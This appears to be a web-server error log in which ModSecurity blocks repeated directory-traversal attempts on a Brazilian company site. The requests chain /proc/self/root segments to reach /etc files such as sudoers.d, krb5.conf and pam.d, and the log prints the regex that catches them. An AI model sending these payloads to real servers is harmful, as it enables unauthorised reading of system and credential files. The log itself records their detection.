[Tue Mar 17 14:21:58.607443 2026] [:error] [pid 29359:tid 140411565680384] [client 74.7.241.31:40732] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmNtqSy22zYCMGxsIldywAAAlU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 14:22:04.915487 2026] [:error] [pid 29359:tid 140411590858496] [client 74.7.243.128:44638] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/tcsd.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmNvKSy22zYCMGxsIld0AAAAlI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:22:06.617245 2026] [:error] [pid 2473:tid 140411699963648] [client 74.7.243.128:42590] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/subgid-"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmNvqBJNF7axNlVR0UYZQAAAAU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:22:08.678835 2026] [:error] [pid 7004:tid 140411574073088] [client 74.7.243.128:42592] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmNwMU6Sx0TG1YjmQiv2AAAApQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:22:09.999854 2026] [:error] [pid 28879:tid 140411557287680] [client 74.7.243.128:46846] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/krb5.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmNwVDN3UhJjLukrK-MIgAAARY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:22:11.650984 2026] [:error] [pid 6296:tid 140411540502272] [client 74.7.243.128:46856] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmNw3Ik7brgkOH-rIWMygAAAVg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:22:19.141097 2026] [proxy_fcgi:error] [pid 28879:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:53712] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:22:22.004108 2026] [:error] [pid 7004:tid 140411548894976] [client 74.7.243.128:43306] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmNzsU6Sx0TG1YjmQiv3wAAApc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:22:24.518606 2026] [:error] [pid 2473:tid 140411548894976] [client 74.7.243.128:43312] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmNz6BJNF7axNlVR0UYawAAABc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:22:27.089884 2026] [:error] [pid 2598:tid 140411548894976] [client 74.7.243.128:43314] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmN0xj0p0SRWAqcjGF6lQAAAxc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:22:28.724327 2026] [:error] [pid 19507:tid 140411557287680] [client 74.7.243.128:43326] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmN1NY0UrI5A3LftIz9HQAAAZY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:22:30.181055 2026] [:error] [pid 6296:tid 140411548894976] [client 74.7.243.128:42200] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmN1nIk7brgkOH-rIWMzQAAAVc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:22:30.580466 2026] [:error] [pid 18380:tid 140411674785536] [client 74.7.241.31:56012] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmN1q4xEDsg_V3ESNZNcQAAAgg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:22:31.570617 2026] [:error] [pid 7004:tid 140411616036608] [client 74.7.243.128:42208] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmN18U6Sx0TG1YjmQiv4gAAAo8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:22:33.041199 2026] [:error] [pid 19507:tid 140411590858496] [client 74.7.243.128:42216] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmN2dY0UrI5A3LftIz9IAAAAZI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:22:41.058851 2026] [proxy_fcgi:error] [pid 19507:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:54450] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:22:42.948399 2026] [:error] [pid 7437:tid 140411607643904] [client 74.7.241.31:58678] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/sysctl.conf.rpmnew"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmN4geiSKl8TjouI-YawQAAA9A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:22:43.671953 2026] [:error] [pid 29359:tid 140411733534464] [client 74.7.243.128:44336] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmN46Sy22zYCMGxsIld1wAAAkE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:22:44.644937 2026] [:error] [pid 2473:tid 140411658000128] [client 74.7.241.31:34164] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmN5KBJNF7axNlVR0UYbQAAAAo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:22:47.071316 2026] [:error] [pid 17965:tid 140411616036608] [client 74.7.241.31:34166] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmN5qt8Nd0UC_OcbVHL9AAAAI8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:22:47.072333 2026] [:error] [pid 29359:tid 140411616036608] [client 74.7.243.128:44336] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmN5qSy22zYCMGxsIld2gAAAk8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:22:48.383721 2026] [:error] [pid 29151:tid 140411632822016] [client 74.7.241.31:36012] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmN6PPqhzTj3BvfDX-JBgAAAc0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:22:49.126279 2026] [:error] [pid 7004:tid 140411741927168] [client 74.7.243.128:44352] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmN6cU6Sx0TG1YjmQiv5AAAAoA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:22:49.959355 2026] [:error] [pid 29151:tid 140411616036608] [client 74.7.241.31:36020] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmN6fPqhzTj3BvfDX-JCAAAAc8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
